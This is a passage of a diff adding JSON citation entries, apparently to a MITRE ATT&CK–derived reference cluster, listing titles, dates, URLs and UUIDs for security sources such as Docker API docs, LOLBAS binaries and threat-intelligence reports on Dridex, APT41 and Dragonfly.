+ ], + "source": "MITRE", + "title": "Docker Engine API v1.41 Reference" + }, + "related": [], + "uuid": "b8ec1e37-7286-40e8-9577-ff9c54801086", + "value": "Docker API" + }, + { + "description": "Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild" + ], + "source": "MITRE", + "title": "Docker Engine API v1.41 Reference - Build an Image" + }, + "related": [], + "uuid": "ee708b64-57f3-4b47-af05-1e26b698c21f", + "value": "Docker Build Image" + }, + { + "description": "Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + "source": "MITRE", + "title": "Docker Engine API v1.41 Reference - Container" + }, + "related": [], + "uuid": "2351cb32-23d6-4557-9c52-e6e228402bab", + "value": "Docker Containers API" + }, + { + "description": "Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/reference/commandline/exec/" + ], + "source": "MITRE", + "title": "Docker Exec" + }, + "related": [], + "uuid": "5f1ace27-6584-4585-98de-52cb71d419c1", + "value": "Docker Exec" + }, + { + "description": "Docker. (n.d.). Docker Images. Retrieved April 6, 2021.", + "meta": { + "date_accessed": "2021-04-06T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/reference/commandline/images/" + ], + "source": "MITRE", + "title": "Docker Images" + }, + "related": [], + "uuid": "9b4d1e80-61e9-4557-a562-5eda66d0bbf7", + "value": "Docker Images" + }, + { + "description": "Docker. (n.d.). Docker Overview. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "refs": [ + "https://docs.docker.com/get-started/overview/" + ], + "source": "MITRE", + "title": "Docker Overview" + }, + "related": [], + "uuid": "52954bb1-16b0-4717-a72c-8a6dec97610b", + "value": "Docker Overview" + }, + { + "description": "Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime" + ], + "source": "MITRE", + "title": "Docker run reference" + }, + "related": [], + "uuid": "c80ad3fd-d7fc-4a7a-8565-da3feaa4a915", + "value": "Docker Entrypoint" + }, + { + "description": "Microsoft. (2012, November 15). Domain controller: Allow server operators to schedule tasks. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2012-11-15T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/jj852168.aspx" + ], + "source": "MITRE", + "title": "Domain controller: Allow server operators to schedule tasks" + }, + "related": [], + "uuid": "a9497afa-42c8-499e-a6b6-4231b1c22f6e", + "value": "TechNet Server Operator Scheduled Task" + }, + { + "description": "Scarfo, A. (2016, October 10). Domain Generation Algorithms – Why so effective?. Retrieved February 18, 2019.", + "meta": { + "date_accessed": "2019-02-18T00:00:00Z", + "date_published": "2016-10-10T00:00:00Z", + "refs": [ + "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/" + ], + "source": "MITRE", + "title": "Domain Generation Algorithms – Why so effective?" + }, + "related": [], + "uuid": "5dbe2bcb-40b9-4ff8-a37a-0893a7a6cb58", + "value": "Cisco Umbrella DGA" + }, + { + "description": "Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.", + "meta": { + "date_accessed": "2019-02-14T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships" + ], + "source": "MITRE", + "title": "Domain.GetAllTrustRelationships Method" + }, + "related": [], + "uuid": "571086ce-42d3-4416-9521-315f694647a6", + "value": "Microsoft GetAllTrustRelationships" + }, + { + "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", + "meta": { + "date_accessed": "2017-03-06T00:00:00Z", + "date_published": "2005-07-12T00:00:00Z", + "refs": [ + "https://www.icann.org/groups/ssac/documents/sac-007-en" + ], + "source": "MITRE", + "title": "Domain Name Hijacking: Incidents, Threats, Risks and Remediation" + }, + "related": [], + "uuid": "96c5ec6c-d53d-49c3-bca1-0b6abe0080e6", + "value": "ICANNDomainNameHijacking" + }, + { + "description": "Janos Szurdi, Rebekah Houser and Daiping Liu. (2022, September 21). Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime. Retrieved March 7, 2023.", + "meta": { + "date_accessed": "2023-03-07T00:00:00Z", + "date_published": "2022-09-21T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/domain-shadowing/" + ], + "source": "MITRE", + "title": "Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime" + }, + "related": [], + "uuid": "ec460017-fd25-5975-b697-c8c11fee960d", + "value": "Palo Alto Unit 42 Domain Shadowing 2022" + }, + { + "description": "Schwarz, D., Sopko J. (2018, March 08). Donot Team Leverages New Modular Malware Framework in South Asia. Retrieved June 11, 2018.", + "meta": { + "date_accessed": "2018-06-11T00:00:00Z", + "date_published": "2018-03-08T00:00:00Z", + "refs": [ + "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + ], + "source": "MITRE", + "title": "Donot Team Leverages New Modular Malware Framework in South Asia" + }, + "related": [], + "uuid": "a1b987cc-7789-411c-9673-3cf6357b207c", + "value": "ASERT Donot March 2018" + }, + { + "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.", + "meta": { + "date_accessed": "2023-08-04T00:00:00Z", + "date_published": "2023-05-22T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse" + ], + "source": "MITRE", + "title": "Don't @ Me: URL Obfuscation Through Schema Abuse" + }, + "related": [], + "uuid": "b63f5934-2ace-5326-89be-7a850469a563", + "value": "Mandiant URL Obfuscation 2023" + }, + { + "description": "TheWover. (2019, May 9). donut. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2019-05-09T00:00:00Z", + "refs": [ + "https://github.com/TheWover/donut" + ], + "source": "MITRE", + "title": "donut" + }, + "related": [], + "uuid": "5f28c41f-6903-4779-93d4-3de99e031b70", + "value": "Donut Github" + }, + { + "description": "The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2019-05-09T00:00:00Z", + "refs": [ + "https://thewover.github.io/Introducing-Donut/" + ], + "source": "MITRE", + "title": "Donut - Injecting .NET Assemblies as Shellcode" + }, + "related": [], + "uuid": "8fd099c6-e002-44d0-8b7f-65f290a42c07", + "value": "Introducing Donut" + }, + { + "description": "LOLBAS. (2019, November 12). Dotnet.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-11-12T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/" + ], + "source": "Tidal Cyber", + "title": "Dotnet.exe" + }, + "related": [], + "uuid": "8abe21ad-88d1-4a5c-b79e-8216b4b06862", + "value": "Dotnet.exe - LOLBAS Project" + }, + { + "description": "Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.", + "meta": { + "date_accessed": "2023-02-24T00:00:00Z", + "date_published": "2022-09-01T00:00:00Z", + "refs": [ + "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends" + ], + "source": "MITRE", + "title": "Double-bounced attacks with email spoofing" + }, + "related": [], + "uuid": "4406d688-c392-5244-b438-6995f38dfc61", + "value": "cyberproof-double-bounce" + }, + { + "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.", + "meta": { + "date_accessed": "2019-09-23T00:00:00Z", + "date_published": "2019-08-07T00:00:00Z", + "refs": [ + "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Double DragonAPT41, a dual espionage and cyber crime operation APT41" + }, + "related": [], + "uuid": "20f8e252-0a95-4ebd-857c-d05b0cde0904", + "value": "FireEye APT41 Aug 2019" + }, + { + "description": "FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.", + "meta": { + "date_accessed": "2019-09-23T00:00:00Z", + "date_published": "2019-01-01T00:00:00Z", + "refs": [ + "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + ], + "source": "MITRE", + "title": "Double DragonAPT41, a dual espionage andcyber crime operationAPT41" + }, + "related": [], + "uuid": "daa31f35-15a6-413b-9319-80d6921d1598", + "value": "FireEye APT41 2019" + }, + { + "description": "Threat Intelligence Team. (2022, March 18). Double header: IsaacWiper and CaddyWiper . Retrieved April 11, 2022.", + "meta": { + "date_accessed": "2022-04-11T00:00:00Z", + "date_published": "2022-03-18T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/" + ], + "source": "MITRE", + "title": "Double header: IsaacWiper and CaddyWiper" + }, + "related": [], + "uuid": "931aed95-a629-4f94-8762-aad580f5d3e2", + "value": "Malwarebytes IssacWiper CaddyWiper March 2022" + }, + { + "description": "Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.", + "meta": { + "date_accessed": "2021-12-09T00:00:00Z", + "date_published": "2017-02-03T00:00:00Z", + "refs": [ + "https://tlseminar.github.io/downgrade-attacks/" + ], + "source": "MITRE", + "title": "Downgrade Attacks" + }, + "related": [], + "uuid": "8b5d46bf-fb4e-4ecd-b8a9-9c084c1864a3", + "value": "tlseminar_downgrade_att" + }, + { + "description": "Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.", + "meta": { + "date_accessed": "2018-12-17T00:00:00Z", + "date_published": "2014-10-03T00:00:00Z", + "refs": [ + "https://logrhythm.com/blog/do-you-trust-your-computer/" + ], + "source": "MITRE", + "title": "Do You Trust Your Computer?" + }, + "related": [], + "uuid": "88a84f9a-e077-4fdd-9936-30fc7b290476", + "value": "LogRhythm Do You Trust Oct 2014" + }, + { + "description": "Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2019-11-22T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/" + ], + "source": "MITRE", + "title": "Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions" + }, + "related": [], + "uuid": "3ec5440a-cb3b-4aa9-8e0e-0f92525ef51c", + "value": "VNC Vulnerabilities" + }, + { + "description": "Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018.", + "meta": { + "date_accessed": "2018-11-14T00:00:00Z", + "date_published": "2018-01-27T00:00:00Z", + "refs": [ + "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf" + ], + "source": "MITRE", + "title": "DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES" + }, + "related": [], + "uuid": "f692c6fa-7b3a-4d1d-9002-b1a59f7116f4", + "value": "Accenture Dragonfish Jan 2018" + }, + { + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "meta": { + "date_accessed": "2016-04-08T00:00:00Z", + "date_published": "2014-06-30T00:00:00Z", + "refs": [ + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + ], + "source": "MITRE, Tidal Cyber", + "title": "Dragonfly: Cyberespionage Attacks Against Energy Suppliers" + }, + "related": [], + "uuid": "9514c5cd-2ed6-4dbf-aa9e-1c425e969226", + "value": "Symantec Dragonfly" + }, + { + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "meta": { + "date_accessed": "2017-09-09T00:00:00Z", + "date_published": "2014-07-07T00:00:00Z", + "refs": [ + "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + ], + "source": "MITRE", + "title": "Dragonfly: Western energy sector targeted by sophisticated attack group" + }, + "related": [], + "uuid": "11bbeafc-ed5d-4d2b-9795-a0a9544fb64e", + "value": "Symantec Dragonfly Sept 2017" + }, + { + "description": "Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.", + "meta": { + "date_accessed": "2022-04-19T00:00:00Z", + "date_published": "2017-10-07T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" + ], + "source": "MITRE", + "title": "Dragonfly: Western energy sector targeted by sophisticated attack group" + }, + "related": [], + "uuid": "a0439d4a-a3ea-4be5-9a01-f223ca259681", + "value": "Symantec Dragonfly 2.0 October 2017" + }, + { + "description": "Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.", + "meta": { + "date_accessed": "2019-05-31T00:00:00Z", + "date_published": "2017-05-25T00:00:00Z", + "refs": [ + "https://securelist.com/dridex-a-history-of-evolution/78531/" + ], + "source": "MITRE", + "title": "Dridex: A History of Evolution" + }, + "related": [], + "uuid": "52c48bc3-2b53-4214-85c3-7e5dd036c969", + "value": "Kaspersky Dridex May 2017" + }, + { + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.", + "meta": { + "date_accessed": "2019-05-31T00:00:00Z", + "date_published": "2015-10-13T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation" + ], + "source": "MITRE", + "title": "Dridex (Bugat v5) Botnet Takeover Operation" + }, + "related": [], + "uuid": "f81ce947-d875-4631-9709-b54c8b5d25bc", + "value": "Dell Dridex Oct 2015" + }, + { + "description": "Red Canary. (2021, February 9). Dridex - Red Canary Threat Detection Report. Retrieved August 3, 2023.", + "meta": { + "date_accessed": "2023-08-03T00:00:00Z", + "date_published": "2021-02-09T00:00:00Z", + "refs": [ + "https://redcanary.com/threat-detection-report/threats/dridex/" + ], + "source": "MITRE", + "title": "Dridex - Red Canary Threat Detection Report" + }, + "related": [], + "uuid": "3be25132-6655-5fa9-92cb-772d02f49d2b", + "value": "Red Canary Dridex Threat Report 2021" + }, + { + "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", + "meta": { + "date_accessed": "2022-07-01T00:00:00Z", + "date_published": "2022-06-15T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/" + ], + "source": "MITRE", + "title": "DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach" + }, + "related": [], + "uuid": "85bee18e-216d-4ea6-b34e-b071e3f63382", + "value": "volexity_0day_sophos_FW" + }, + { + "description": "Microsoft. (n.d.). driverquery. Retrieved March 28, 2023.", + "meta": { + "date_accessed": "2023-03-28T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery" + ], + "source": "MITRE", + "title": "driverquery" + }, + "related": [], + "uuid": "7302dc00-a75a-5787-a04c-88ef4922ac09", + "value": "Microsoft Driverquery" + }, + { + "description": "David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.", + "meta": { + "date_accessed": "2023-05-31T00:00:00Z", + "date_published": "2013-08-21T00:00:00Z", + "refs": [ + "https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/" + ], + "source": "MITRE", + "title": "Dropbox and Similar Services Can Sync Malware" + }, + "related": [], + "uuid": "06ca63fa-8c6c-501c-96d3-5e7e45ca1e04", + "value": "Dropbox Malware Sync" + }, + { + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.", + "meta": { + "date_accessed": "2020-09-10T00:00:00Z", + "date_published": "2019-12-11T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware" + ], + "source": "MITRE", + "title": "DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE" + }, + "related": [], + "uuid": "a8dc5598-9963-4a1d-a473-bee8d2c72c57", + "value": "Cyberreason Anchor December 2019" + }, + { + "description": "SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "refs": [ + "https://wiki.samba.org/index.php/DRSUAPI" + ], + "source": "MITRE", + "title": "DRSUAPI" + }, + "related": [], + "uuid": "79e8f598-9962-4124-b884-eb10f86885af", + "value": "Samba DRSUAPI" + }, + { + "description": "LOLBAS. (2023, May 31). dsdbutil.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-05-31T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dsdbutil/" + ], + "source": "Tidal Cyber", + "title": "dsdbutil.exe" + }, + "related": [], + "uuid": "fc982faf-a37d-4d0b-949c-f7a27adc3030", + "value": "dsdbutil.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (n.d.). Dsquery. Retrieved April 18, 2016.", + "meta": { + "date_accessed": "2016-04-18T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc732952.aspx" + ], + "source": "MITRE", + "title": "Dsquery" + }, + "related": [], + "uuid": "bbbb4a45-2963-4f04-901a-fb2752800e12", + "value": "TechNet Dsquery" + }, + { + "description": "Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021.", + "meta": { + "date_accessed": "2021-01-20T00:00:00Z", + "date_published": "2019-11-21T00:00:00Z", + "refs": [ + "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/" + ], + "source": "MITRE", + "title": "Dtrack: In-depth analysis of APT on a nuclear power plant" + }, + "related": [], + "uuid": "1ac944f4-868c-4312-8b5d-1580fd6542a0", + "value": "CyberBit Dtrack" + }, + { + "description": "Kaspersky Global Research and Analysis Team. (2019, September 23). DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers. Retrieved January 20, 2021.", + "meta": { + "date_accessed": "2021-01-20T00:00:00Z", + "date_published": "2019-09-23T00:00:00Z", + "refs": [ + "https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers" + ], + "source": "MITRE", + "title": "DTrack: previously unknown spy-tool by Lazarus hits financial institutions and research centers" + }, + "related": [], + "uuid": "0122ee35-938d-493f-a3bb-bc75fc808f62", + "value": "Kaspersky Dtrack" + }, + { + "description": "CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.", + "meta": { + "date_accessed": "2021-09-27T00:00:00Z", + "date_published": "2020-10-07T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/" + ], + "source": "MITRE", + "title": "Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2" + }, + "related": [], + "uuid": "636a9b94-8260-45cc-bd74-a764cd8f50b0", + "value": "Crowdstrike Qakbot October 2020" + }, + { + "description": "LOLBAS. (2021, November 16). Dump64.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-11-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/" + ], + "source": "Tidal Cyber", + "title": "Dump64.exe" + }, + "related": [], + "uuid": "b0186447-a6d5-40d7-a11d-ab2e9fb93087", + "value": "Dump64.exe - LOLBAS Project" + }, + { + "description": "Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.", + "meta": { + "date_accessed": "2021-11-15T00:00:00Z", + "date_published": "2015-11-22T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=2053" + ], + "source": "MITRE", + "title": "Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync" + }, + "related": [], + "uuid": "bd1d7e75-feee-47fd-abfb-7e3dfc648a72", + "value": "dump_pwd_dcsync" + }, + { + "description": "Mantvydas Baranauskas. (2019, November 16). Dumping and Cracking mscash - Cached Domain Credentials. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2019-11-16T00:00:00Z", + "refs": [ + "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials" + ], + "source": "MITRE", + "title": "Dumping and Cracking mscash - Cached Domain Credentials" + }, + "related": [], + "uuid": "5b643e7d-1ace-4517-88c2-96115cac1209", + "value": "ired mscache" + }, + { + "description": "Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets. Retrieved February 21, 2020.", + "meta": { + "date_accessed": "2020-02-21T00:00:00Z", + "date_published": "2019-11-16T00:00:00Z", + "refs": [ + "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets" + ], + "source": "MITRE", + "title": "Dumping LSA Secrets" + }, + "related": [], + "uuid": "cf883397-11e9-4f94-977a-bbe46e3107f5", + "value": "ired Dumping LSA Secrets" + }, + { + "description": "LOLBAS. (2022, January 20). DumpMinitool.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-01-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/" + ], + "source": "Tidal Cyber", + "title": "DumpMinitool.exe" + }, + "related": [], + "uuid": "4634e025-c005-46fe-b97c-5d7dda455ba0", + "value": "DumpMinitool.exe - LOLBAS Project" + }, + { + "description": "Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.", + "meta": { + "date_accessed": "2018-04-10T00:00:00Z", + "date_published": "2017-12-29T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Duqu" + ], + "source": "MITRE", + "title": "Duqu" + }, + "related": [], + "uuid": "5cf0101e-c036-4c1c-b322-48f04e2aef0b", + "value": "Wikipedia Duqu" + }, + { + "description": "LOLBAS. (2018, May 25). Dxcap.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/" + ], + "source": "Tidal Cyber", + "title": "Dxcap.exe" + }, + "related": [], + "uuid": "7611eb7a-46b7-4c76-9728-67c1fbf20e17", + "value": "Dxcap.exe - LOLBAS Project" + }, + { + "description": "Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.", + "meta": { + "date_accessed": "2020-03-26T00:00:00Z", + "date_published": "2019-07-09T00:00:00Z", + "refs": [ + "https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/" + ], + "source": "MITRE", + "title": "DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX" + }, + "related": [], + "uuid": "bd27026c-81eb-480e-b092-f861472ac775", + "value": "TheEvilBit DYLD_INSERT_LIBRARIES" + }, + { + "description": "Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "date_published": "2015-03-01T00:00:00Z", + "refs": [ + "https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf" + ], + "source": "MITRE", + "title": "Dylib Hijacking on OS X" + }, + "related": [], + "uuid": "c78d8c94-4fe3-4aa9-b879-f0b0e9d2714b", + "value": "Wardle Dylib Hijacking OSX 2015" + }, + { + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.", + "meta": { + "date_accessed": "2020-08-20T00:00:00Z", + "refs": [ + "https://www.dragos.com/threat/dymalloy/" + ], + "source": "MITRE", + "title": "DYMALLOY" + }, + "related": [], + "uuid": "d2785c6e-e0d1-4e90-a2d5-2c302176d5d3", + "value": "Dragos DYMALLOY" + }, + { + "description": "Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User Mode. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2015-08-08T00:00:00Z", + "refs": [ + "https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/" + ], + "source": "MITRE", + "title": "Dynamic Hooking Techniques: User Mode" + }, + "related": [], + "uuid": "3cb6d0b1-4d6b-4f2d-bd7d-e4b2dcde081d", + "value": "MWRInfoSecurity Dynamic Hooking 2015" + }, + { + "description": "Droms, R. (1997, March). Dynamic Host Configuration Protocol. Retrieved March 9, 2022.", + "meta": { + "date_accessed": "2022-03-09T00:00:00Z", + "date_published": "1997-03-01T00:00:00Z", + "refs": [ + "https://datatracker.ietf.org/doc/html/rfc2131" + ], + "source": "MITRE", + "title": "Dynamic Host Configuration Protocol" + }, + "related": [], + "uuid": "b16bd2d5-162b-44cb-a812-7becd6684021", + "value": "rfc2131" + }, + { + "description": "J. Bound, et al. (2003, July). Dynamic Host Configuration Protocol for IPv6 (DHCPv6). Retrieved June 27, 2022.", + "meta": { + "date_accessed": "2022-06-27T00:00:00Z", + "date_published": "2003-07-01T00:00:00Z", + "refs": [ + "https://datatracker.ietf.org/doc/html/rfc3315" + ], + "source": "MITRE", + "title": "Dynamic Host Configuration Protocol for IPv6 (DHCPv6)" + }, + "related": [], + "uuid": "9349f864-79e9-4481-ad77-44099621795a", + "value": "rfc3315" + }, + { + "description": "Microsoft. (n.d.). Dynamic-Link Library Redirection. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "refs": [ + "http://msdn.microsoft.com/en-US/library/ms682600" + ], + "source": "MITRE", + "title": "Dynamic-Link Library Redirection" + }, + "related": [], + "uuid": "ac60bb28-cb14-4ff9-bc05-df48273a28a9", + "value": "Microsoft DLL Redirection" + }, + { + "description": "Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Dynamic-Link Library Redirection" + }, + "related": [], + "uuid": "72458590-ee1b-4447-adb8-ca4f486d1db5", + "value": "Microsoft Dynamic-Link Library Redirection" + }, + { + "description": "Microsoft. (n.d.). Dynamic-Link Library Search Order. Retrieved November 30, 2014.", + "meta": { + "date_accessed": "2014-11-30T00:00:00Z", + "refs": [ + "http://msdn.microsoft.com/en-US/library/ms682586" + ], + "source": "MITRE", + "title": "Dynamic-Link Library Search Order" + }, + "related": [], + "uuid": "c157444d-bf2b-4806-b069-519122b7a459", + "value": "Microsoft DLL Search" + }, + { + "description": "Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.", + "meta": { + "date_accessed": "2014-11-30T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Dynamic-Link Library Search Order" + }, + "related": [], + "uuid": "7b1f945b-2547-4bc6-98bf-30248bdf3587", + "value": "Microsoft Dynamic Link Library Search Order" + }, + { + "description": "Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved July 25, 2016.", + "meta": { + "date_accessed": "2016-07-25T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/ff919712.aspx" + ], + "source": "MITRE", + "title": "Dynamic-Link Library Security" + }, + "related": [], + "uuid": "5d1d1916-cef4-49d1-b8e2-a6d18fb297f6", + "value": "MSDN DLL Security" + }, + { + "description": "Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved July 25, 2016.", + "meta": { + "date_accessed": "2016-07-25T00:00:00Z", + "refs": [ + 